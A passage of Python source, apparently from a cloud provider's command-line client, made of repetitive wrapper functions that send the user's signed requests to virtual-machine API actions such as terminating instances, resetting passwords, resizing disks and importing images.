        "InstanceIds": Utils.try_to_json(argv, "--InstanceIds"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.TerminateInstancesRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.TerminateInstances(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doModifyInstancesVpcAttribute(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("ModifyInstancesVpcAttribute", g_param[OptionsDefine.Version])
        return

    param = {
        "InstanceIds": Utils.try_to_json(argv, "--InstanceIds"),
        "VirtualPrivateCloud": Utils.try_to_json(argv, "--VirtualPrivateCloud"),
        "ForceStop": Utils.try_to_json(argv, "--ForceStop"),
        "ReserveHostName": Utils.try_to_json(argv, "--ReserveHostName"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.ModifyInstancesVpcAttributeRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.ModifyInstancesVpcAttribute(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doInquiryPriceResetInstance(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("InquiryPriceResetInstance", g_param[OptionsDefine.Version])
        return

    param = {
        "InstanceId": argv.get("--InstanceId"),
        "ImageId": argv.get("--ImageId"),
        "SystemDisk": Utils.try_to_json(argv, "--SystemDisk"),
        "LoginSettings": Utils.try_to_json(argv, "--LoginSettings"),
        "EnhancedService": Utils.try_to_json(argv, "--EnhancedService"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.InquiryPriceResetInstanceRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.InquiryPriceResetInstance(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doDescribeDisasterRecoverGroupQuota(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("DescribeDisasterRecoverGroupQuota", g_param[OptionsDefine.Version])
        return

    param = {
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeDisasterRecoverGroupQuotaRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.DescribeDisasterRecoverGroupQuota(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doResetInstancesPassword(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("ResetInstancesPassword", g_param[OptionsDefine.Version])
        return

    param = {
        "InstanceIds": Utils.try_to_json(argv, "--InstanceIds"),
        "Password": argv.get("--Password"),
        "UserName": argv.get("--UserName"),
        "ForceStop": Utils.try_to_json(argv, "--ForceStop"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.ResetInstancesPasswordRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.ResetInstancesPassword(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doPurchaseReservedInstancesOffering(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("PurchaseReservedInstancesOffering", g_param[OptionsDefine.Version])
        return

    param = {
        "InstanceCount": Utils.try_to_json(argv, "--InstanceCount"),
        "ReservedInstancesOfferingId": argv.get("--ReservedInstancesOfferingId"),
        "DryRun": Utils.try_to_json(argv, "--DryRun"),
        "ClientToken": argv.get("--ClientToken"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.PurchaseReservedInstancesOfferingRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.PurchaseReservedInstancesOffering(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doResizeInstanceDisks(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("ResizeInstanceDisks", g_param[OptionsDefine.Version])
        return

    param = {
        "InstanceId": argv.get("--InstanceId"),
        "DataDisks": Utils.try_to_json(argv, "--DataDisks"),
        "ForceStop": Utils.try_to_json(argv, "--ForceStop"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.ResizeInstanceDisksRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.ResizeInstanceDisks(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doDescribeReservedInstances(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("DescribeReservedInstances", g_param[OptionsDefine.Version])
        return

    param = {
        "DryRun": Utils.try_to_json(argv, "--DryRun"),
        "Offset": Utils.try_to_json(argv, "--Offset"),
        "Limit": Utils.try_to_json(argv, "--Limit"),
        "Filters": Utils.try_to_json(argv, "--Filters"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeReservedInstancesRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.DescribeReservedInstances(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doDescribeZones(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("DescribeZones", g_param[OptionsDefine.Version])
        return

    param = {
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeZonesRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.DescribeZones(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doCreateImage(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("CreateImage", g_param[OptionsDefine.Version])
        return

    param = {
        "ImageName": argv.get("--ImageName"),
        "InstanceId": argv.get("--InstanceId"),
        "ImageDescription": argv.get("--ImageDescription"),
        "ForcePoweroff": argv.get("--ForcePoweroff"),
        "Sysprep": argv.get("--Sysprep"),
        "DataDiskIds": Utils.try_to_json(argv, "--DataDiskIds"),
        "SnapshotIds": Utils.try_to_json(argv, "--SnapshotIds"),
        "DryRun": Utils.try_to_json(argv, "--DryRun"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.CreateImageRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.CreateImage(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doAssociateSecurityGroups(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("AssociateSecurityGroups", g_param[OptionsDefine.Version])
        return

    param = {
        "SecurityGroupIds": Utils.try_to_json(argv, "--SecurityGroupIds"),
        "InstanceIds": Utils.try_to_json(argv, "--InstanceIds"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.AssociateSecurityGroupsRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.AssociateSecurityGroups(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doResetInstancesType(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("ResetInstancesType", g_param[OptionsDefine.Version])
        return

    param = {
        "InstanceIds": Utils.try_to_json(argv, "--InstanceIds"),
        "InstanceType": argv.get("--InstanceType"),
        "ForceStop": Utils.try_to_json(argv, "--ForceStop"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.ResetInstancesTypeRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.ResetInstancesType(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doModifyImageAttribute(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("ModifyImageAttribute", g_param[OptionsDefine.Version])
        return

    param = {
        "ImageId": argv.get("--ImageId"),
        "ImageName": argv.get("--ImageName"),
        "ImageDescription": argv.get("--ImageDescription"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.ModifyImageAttributeRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.ModifyImageAttribute(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doDescribeInstancesOperationLimit(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("DescribeInstancesOperationLimit", g_param[OptionsDefine.Version])
        return

    param = {
        "InstanceIds": Utils.try_to_json(argv, "--InstanceIds"),
        "Operation": argv.get("--Operation"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeInstancesOperationLimitRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.DescribeInstancesOperationLimit(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doInquiryPriceResetInstancesType(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("InquiryPriceResetInstancesType", g_param[OptionsDefine.Version])
        return

    param = {
        "InstanceIds": Utils.try_to_json(argv, "--InstanceIds"),
        "InstanceType": argv.get("--InstanceType"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.InquiryPriceResetInstancesTypeRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.InquiryPriceResetInstancesType(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doDescribeInstanceFamilyConfigs(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("DescribeInstanceFamilyConfigs", g_param[OptionsDefine.Version])
        return

    param = {
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeInstanceFamilyConfigsRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.DescribeInstanceFamilyConfigs(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doDeleteDisasterRecoverGroups(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("DeleteDisasterRecoverGroups", g_param[OptionsDefine.Version])
        return

    param = {
        "DisasterRecoverGroupIds": Utils.try_to_json(argv, "--DisasterRecoverGroupIds"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DeleteDisasterRecoverGroupsRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.DeleteDisasterRecoverGroups(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doDescribeImportImageOs(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("DescribeImportImageOs", g_param[OptionsDefine.Version])
        return

    param = {
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeImportImageOsRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.DescribeImportImageOs(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doResetInstancesInternetMaxBandwidth(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("ResetInstancesInternetMaxBandwidth", g_param[OptionsDefine.Version])
        return

    param = {
        "InstanceIds": Utils.try_to_json(argv, "--InstanceIds"),
        "InternetAccessible": Utils.try_to_json(argv, "--InternetAccessible"),
        "StartTime": argv.get("--StartTime"),
        "EndTime": argv.get("--EndTime"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.ResetInstancesInternetMaxBandwidthRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.ResetInstancesInternetMaxBandwidth(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doResetInstance(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("ResetInstance", g_param[OptionsDefine.Version])
        return

    param = {
        "InstanceId": argv.get("--InstanceId"),
        "ImageId": argv.get("--ImageId"),
        "SystemDisk": Utils.try_to_json(argv, "--SystemDisk"),
        "LoginSettings": Utils.try_to_json(argv, "--LoginSettings"),
        "EnhancedService": Utils.try_to_json(argv, "--EnhancedService"),
        "HostName": argv.get("--HostName"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.ResetInstanceRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.ResetInstance(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doSyncImages(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("SyncImages", g_param[OptionsDefine.Version])
        return

    param = {
        "ImageIds": Utils.try_to_json(argv, "--ImageIds"),
        "DestinationRegions": Utils.try_to_json(argv, "--DestinationRegions"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.SyncImagesRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.SyncImages(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doModifyKeyPairAttribute(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("ModifyKeyPairAttribute", g_param[OptionsDefine.Version])
        return

    param = {
        "KeyId": argv.get("--KeyId"),
        "KeyName": argv.get("--KeyName"),
        "Description": argv.get("--Description"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.ModifyKeyPairAttributeRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.ModifyKeyPairAttribute(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doImportImage(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("ImportImage", g_param[OptionsDefine.Version])
return
param = {
"Architecture": argv.get("--Architecture"),
"OsType": argv.get("--OsType"),
"OsVersion": argv.get("--OsVersion"),
"ImageUrl": argv.get("--ImageUrl"),
"ImageName": argv.get("--ImageName"),
"ImageDescription": argv.get("--ImageDescription"),
"DryRun": Utils.try_to_json(argv, "--DryRun"),
"Force": Utils.try_to_json(argv, "--Force"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
